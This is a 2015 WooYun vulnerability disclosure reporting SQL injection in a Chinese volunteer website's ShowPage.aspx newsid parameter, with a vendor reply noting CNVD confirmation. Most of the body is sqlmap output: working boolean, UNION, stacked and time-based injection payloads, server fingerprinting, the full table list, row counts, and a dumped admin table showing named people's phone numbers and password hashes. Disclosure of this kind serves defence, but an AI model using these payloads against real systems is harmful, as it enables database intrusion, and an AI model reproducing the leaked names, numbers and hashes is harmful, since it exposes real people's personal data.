当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149410

漏洞标题:某志愿者网注入漏洞,导致上万志愿者档案泄露(姓名/学校/照片/手机号码/生日/地址等)

相关厂商:某志愿者网

漏洞作者: 路人甲

提交时间:2015-10-27 14:52

修复时间:2015-12-14 17:50

公开时间:2015-12-14 17:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-27: 细节已通知厂商并且等待厂商处理中
2015-10-30: 厂商已经确认,细节仅向厂商公开
2015-11-09: 细节向核心白帽子及相关领域专家公开
2015-11-19: 细节向普通白帽子公开
2015-11-29: 细节向实习白帽子公开
2015-12-14: 细节向公众公开

简要描述:

RT

详细说明:

链接:http://**.**.**.**/volunteers/ShowPage.aspx?newsid=9938
某志愿者网注入漏洞,导致上万志愿者档案泄露(姓名/学校/照片/手机号码/生日/地址等)
共17212条记录,分574页,当前为第1页,每页30条

sqlmap identified the following injection points with a total of 0 HTTP(s) requ
sts:
---
Place: GET
Parameter: newsid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsid=9938' AND 7081=7081 AND 'YNze'='YNze
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: newsid=-1077' UNION ALL SELECT CHAR(58) CHAR(115) CHAR(112) CHAR(9
) CHAR(58) CHAR(67) CHAR(102) CHAR(68) CHAR(79) CHAR(109) CHAR(87) CHAR(70) CHA
(101) CHAR(77) CHAR(102) CHAR(58) CHAR(119) CHAR(112) CHAR(105) CHAR(58),NULL,N
LL--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: newsid=9938'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: newsid=9938' WAITFOR DELAY '0:0:5'--
---
[20:20:20] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[20:20:20] [INFO] fetching tables for database: hds0280121_db
available databases [3]:
[*] hds0280121_db
[*] master
[*] tempdb
current database:    'hds0280121_db'
Database: hds0280121_db
[103 tables]
+------------------------+
| Adminpictemp           |
| Art_Example            |
| Art_board              |
| Art_class              |
| Art_type               |
| D99_CMD                |
| D99_Tmp                |
| Dv_Admin               |
| Dv_BbsLink             |
| Dv_Upfile              |
| Event_Info             |
| Event_Star             |
| Jangli                 |
| Post                   |
| Userpictemp            |
| VolunteerStar          |
| Volunteers             |
| ad_ads                 |
| ad_iplist              |
| ad_weizhi              |
| admin                  |
| article                |
| clear                  |
| declare_unit           |
| diaodong_info          |
| dnt_admingroups        |
| dnt_adminvisitlog      |
| dnt_advertisements     |
| dnt_announcements      |
| dnt_attachments        |
| dnt_attachpaymentlog   |
| dnt_attachtypes        |
| dnt_banned             |
| dnt_bbcodes            |
| dnt_bonuslog           |
| dnt_creditslog         |
| dnt_debatediggs        |
| dnt_debates            |
| dnt_failedlogins       |
| dnt_favorites          |
| dnt_forumfields        |
| dnt_forumlinks         |
| dnt_forums             |
| dnt_help               |
| dnt_invitation         |
| dnt_locations          |
| dnt_medals             |
| dnt_medalslog          |
| dnt_moderatormanagelog |
| dnt_moderators         |
| dnt_myattachments      |
| dnt_myposts            |
| dnt_mytopics           |
| dnt_navs               |
| dnt_notices            |
| dnt_online             |
| dnt_onlinelist         |
| dnt_onlinetime         |
| dnt_orders             |
| dnt_paymentlog         |
| dnt_pms                |
| dnt_polloptions        |
| dnt_polls              |
| dnt_postdebatefields   |
| dnt_postid             |
| dnt_posts1             |
| dnt_ratelog            |
| dnt_scheduledevents    |
| dnt_searchcaches       |
| dnt_smilies            |
| dnt_statistics         |
| dnt_stats              |
| dnt_statvars           |
| dnt_tablelist          |
| dnt_tags               |
| dnt_templates          |
| dnt_topicidentify      |
| dnt_topics             |
| dnt_topictagcaches     |
| dnt_topictags          |
| dnt_topictypes         |
| dnt_trendstat          |
| dnt_userfields         |
| dnt_usergroups         |
| dnt_users              |
| dnt_words              |
| event_images           |
| event_top30            |
| extentinfo             |
| faq                    |
| fire_unit              |
| imgnclass              |
| jubao                  |
| link                   |
| liuyan                 |
| requestService         |
| review                 |
| smsSend                |
| sms_recv               |
| sms_send_permission    |
| video                  |
| zhiwei                 |
| zy_unit                |
+------------------------+


2.png


3.png


4.png


11.png


漏洞证明:

Database: hds0280121_db
+----------------------------+---------+
| Table                      | Entries |
+----------------------------+---------+
| dbo.dnt_pms                | 112717  |
| dbo.dnt_pms                | 112717  |
| dbo.dnt_userfields         | 75860   |
| dbo.dnt_userfields         | 75860   |
| dbo.dnt_users              | 75856   |
| dbo.dnt_users              | 75856   |
| dbo.dnt_myposts            | 61409   |
| dbo.dnt_myposts            | 61409   |
| dbo.dnt_mytopics           | 41301   |
| dbo.dnt_mytopics           | 41301   |
| dbo.dnt_posts1             | 22052   |
| dbo.dnt_posts1             | 22052   |
| dbo.Volunteers             | 17212   |
| dbo.Volunteers             | 17212   |
| dbo.smsSend                | 14729   |
| dbo.smsSend                | 14729   |
| dbo.dnt_scheduledevents    | 7168    |
| dbo.dnt_scheduledevents    | 7168    |
| dbo.dnt_myattachments      | 6477    |
| dbo.dnt_myattachments      | 6477    |
| dbo.dnt_attachments        | 6475    |
| dbo.dnt_attachments        | 6475    |
| dbo.Dv_Upfile              | 6466    |
| dbo.Dv_Upfile              | 6466    |
| dbo.Event_Info             | 4916    |
| dbo.Event_Info             | 4916    |
| dbo.event_images           | 4480    |
| dbo.event_images           | 4480    |
| dbo.article                | 3779    |
| dbo.article                | 3779    |
| dbo.diaodong_info          | 3332    |
| dbo.diaodong_info          | 3332    |
| dbo.dnt_adminvisitlog      | 2189    |
| dbo.dnt_adminvisitlog      | 2189    |
| dbo.dnt_topics             | 1988    |
| dbo.dnt_topics             | 1988    |
| dbo.dnt_onlinetime         | 1914    |
| dbo.dnt_onlinetime         | 1914    |
| dbo.dnt_statvars           | 1194    |
| dbo.dnt_statvars           | 1194    |
| dbo.dnt_trendstat          | 947     |
| dbo.dnt_trendstat          | 947     |
| dbo.sms_recv               | 848     |
| dbo.sms_recv               | 848     |
| dbo.review                 | 685     |
| dbo.review                 | 685     |
| dbo.faq                    | 448     |
| dbo.faq                    | 448     |
| dbo.dnt_moderatormanagelog | 199     |
| dbo.dnt_moderatormanagelog | 199     |
| dbo.zy_unit                | 116     |
| dbo.zy_unit                | 116     |
| dbo.dnt_smilies            | 88      |
| dbo.dnt_smilies            | 88      |
| dbo.Art_class              | 57      |
Database: hds0280121_db                                                                                                                                                        
Table: admin
[12 columns]
+-----------------+----------+
| Column          | Type     |
+-----------------+----------+
| id              | int      |
| is_checkSmsSend | bit      |
| name            | nvarchar |
| phone           | nvarchar |
| sign            | smallint |
| type            | bit      |
| typeidlist      | nvarchar |
| unit_id         | int      |
| userid          | nvarchar |
| userpwd         | nvarchar |
| zyunit_id       | int      |
| zyzhiweiID      | int      |
+-----------------+----------+
Database: hds0280121_db
Table: admin
[35 entries]
+-----------+-------+------------------+------------------+
| userid    | name  | phone            | userpwd          |
+-----------+-------+------------------+------------------+
| rzcch     | 陈长红   | <blank>          | 49ba59abbe56e057 |
| chengxf   | 成雪峰   | <blank>          | c604005a3730fc3c |
| rzgqj     | 管清江   | 18206337801      | 49ba59abbe56e057 |
| libin     | 李彬    | 123456           | 49ba59abbe56e057 |
| clazy1981 | 临时管理员 | <blank>          | 4a927e217360e437 |
| rzly      | 刘艳    | <blank>          | 1714190a8d1b7d5d |
| lslym     | 刘永敏   | 06332632262      | 617c8efee38dfd8c |
| 火凤凰       | 牟宗礼   | 18663060083      | ccc4e939b7a5f140 |
| chipj     | 时培军   | 13563320119      | 9e6cca65f83dcff1 |
| fireren   | 系统管理  | 029-86698115-608 | fe2bce34e966e4a1 |  780218
| xcs       | 许传升   | <blank>          | b7a2eb2fbc258906 |
| rzxujw    | 许加文   | 13963311158      | 7f98517fc9851c0c |
| xujw      | 雪妖    | 0633-8222798     | 7f98517fc9851c0c |
| yanzj     | 闫早俊   | <blank>          | eacdf51aa2a5306b |
| rzyangj   | 杨军    | <blank>          | 9d8a121ce581499d |
| rzyuanyy  | 袁杨杨   | 3282217          | 49ba59abbe56e057 |
| tree      | 张平丽   | <blank>          | 720fc93ed27f97c3 |
| tree      | 张平丽   | <blank>          | 720fc93ed27f97c3 |


11.png


6.png


7.png


12.jpg


13.png


14.png


修复方案:

过滤。。。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-30 17:50

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。

最新状态:

暂无